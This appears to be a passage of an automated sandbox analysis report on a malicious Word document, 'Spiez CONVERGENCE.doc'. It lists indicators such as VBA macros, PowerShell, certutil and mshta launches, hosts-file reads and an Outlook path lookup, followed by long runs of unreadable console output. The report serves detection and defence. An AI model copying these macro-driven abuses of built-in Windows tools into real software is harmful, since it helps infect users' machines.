Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3664

Deletes files inside the Windows folder

Show sources

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cerEC93.tmp

Document contains an ObjectPool stream indicating possible embedded files or OLE objects

Show sources

Source: Spiez CONVERGENCE.doc

OLE indicator, ObjectPool: true

Document contains embedded VBA macros

Show sources

Source: Spiez CONVERGENCE.doc

OLE indicator, VBA macros: true

One or more processes crash

Show sources

Source: unknown

Process created: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@52/33@16/3

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$iez CONVERGENCE.doc

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR975F.tmp

Jump to behavior

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: Spiez CONVERGENCE.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: Spiez CONVERGENCE.doc

OLE document summary: title field not present or empty

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2......3.ip.../........3.i........L\|.i......-l$(.i..-l..I$L\|.iH............7.i.......i....X?........2.....$(.i...i....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................/.......\...A.Gu................a.Gu..0.............D......................./.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......;...X?......A.Gux...............a.Gu..0.............D.......................;.........2.\.....Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................;.......\...A.Gu................a.Gu..0.............D...)...................;.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.0.............D...Q...................G.......X...".....Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................G.......\...A.Gu................a.Gu..0.............D...l...................G.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......S...X?......A.Gux...............a.Gu..0.............D.......................S.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................S.......\...A.Gu................a.Gu..0.............D.......................S.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x......._...X?......A.Gux...............a.Gu..0.............D......................._.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................_.......\...A.Gu................a.Gu..0.............D......................._.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......k...X?......A.Gux...............a.Gu..0.............D.......................k.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................k.......\...A.Gu................a.Gu..0.............D...5...................k.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......w...X?......A.Gux...............a.Gu..0.............D...]...................w.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................w.......\...A.Gu................a.Gu..0.............D...x...................w.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...).............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...D.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...l.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...5.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...P.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...x.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...A.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...\.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...%.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......+...X?......A.Gux...............a.Gu..0.............D...M...................+.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................+.......\...A.Gu................a.Gu..0.............D...h...................+.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......7...X?......A.Gux...............a.Gu..0.............D.......................7.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................7.......\...A.Gu................a.Gu..0.............D.......................7.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......C...X?......A.Gux...............a.Gu..0.............D.......................C.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................C.......\...A.Gu................a.Gu..0.............D.......................C.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......O...X?......A.Gux...............a.Gu..0.............D.......................O.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................O.......\...A.Gu................a.Gu..0.............D...1...................O.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......[...X?......A.Gux...............a.Gu..0.............D...Y...................[.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................[.......\...A.Gu................a.Gu..0.............D...t...................[.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......g...X?......A.Gux...............a.Gu..0.............D.......................g.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................g.......\...A.Gu................a.Gu..0.............D.......................g.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......s...X?......A.Gux...............a.Gu..0.............D.......................s.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................s.......\...A.Gu................a.Gu..0.............D.......................s.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...".............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...=.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...e.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...I.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...q.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...:.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...U.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...}.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...F.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...a.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......'...X?......A.Gux...............a.Gu..0.............D.......................'.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................'.......\...A.Gu................a.Gu..0.............D.......................'.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......3...X?......A.Gux...............a.Gu..0.............D.......................3.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................3.......\...A.Gu................a.Gu..0.............D...-...................3.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......?...X?......A.Gux...............a.Gu..0.............D...U...................?.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................?.......\...A.Gu................a.Gu..0.............D...p...................?.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......K...X?......A.Gux...............a.Gu..0.............D.......................K.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................K.......\...A.Gu................a.Gu..0.............D.......................K.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......W...X?......A.Gux...............a.Gu..0.............D.......................W.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................W.......\...A.Gu................a.Gu..0.............D.......................W.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......c...X?......A.Gux...............a.Gu..0.............D.......................c.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................c.......\...A.Gu................a.Gu..0.............D...9...................c.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......o...X?......A.Gux...............a.Gu..0.............D...a...................o.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................o.......\...A.Gu................a.Gu..0.............D...\|...................o.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......{...X?......A.Gux...............a.Gu..0.............D.......................{.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................{.......\...A.Gu................a.Gu..0.............D.......................{.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...*.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...E.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...m.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...6.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...Q.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...y.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...B.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...].....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...&.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......#...X?......A.Gux...............a.Gu..0.............D...N...................#.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................#.......\...A.Gu................a.Gu..0.............D...i...................#.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x......./...X?......A.Gux...............a.Gu..0.............D......................./.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................/.......\...A.Gu................a.Gu..0.............D......................./.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......;...X?......A.Gux...............a.Gu..0.............D.......................;.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................;.......\...A.Gu................a.Gu..0.............D.......................;.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......G...X?......A.Gux...............a.Gu..0.............D.......................G.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................G.......\...A.Gu................a.Gu..0.............D...2...................G.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......S...X?......A.Gux...............a.Gu..0.............D...Z...................S.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................S.......\...A.Gu................a.Gu..0.............D...u...................S.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x......._...X?......A.Gux...............a.Gu..0.............D......................._.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................_.......\...A.Gu................a.Gu..0.............D......................._.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......k...X?......A.Gux...............a.Gu..0.............D.......................k.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................k.......\...A.Gu................a.Gu..0.............D.......................k.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x.......w...X?......A.Gux...............a.Gu..0.............D...#...................w.........2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................w.......\...A.Gu................a.Gu..0.............D...>...................w.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...f.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...2.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...M.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...u.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
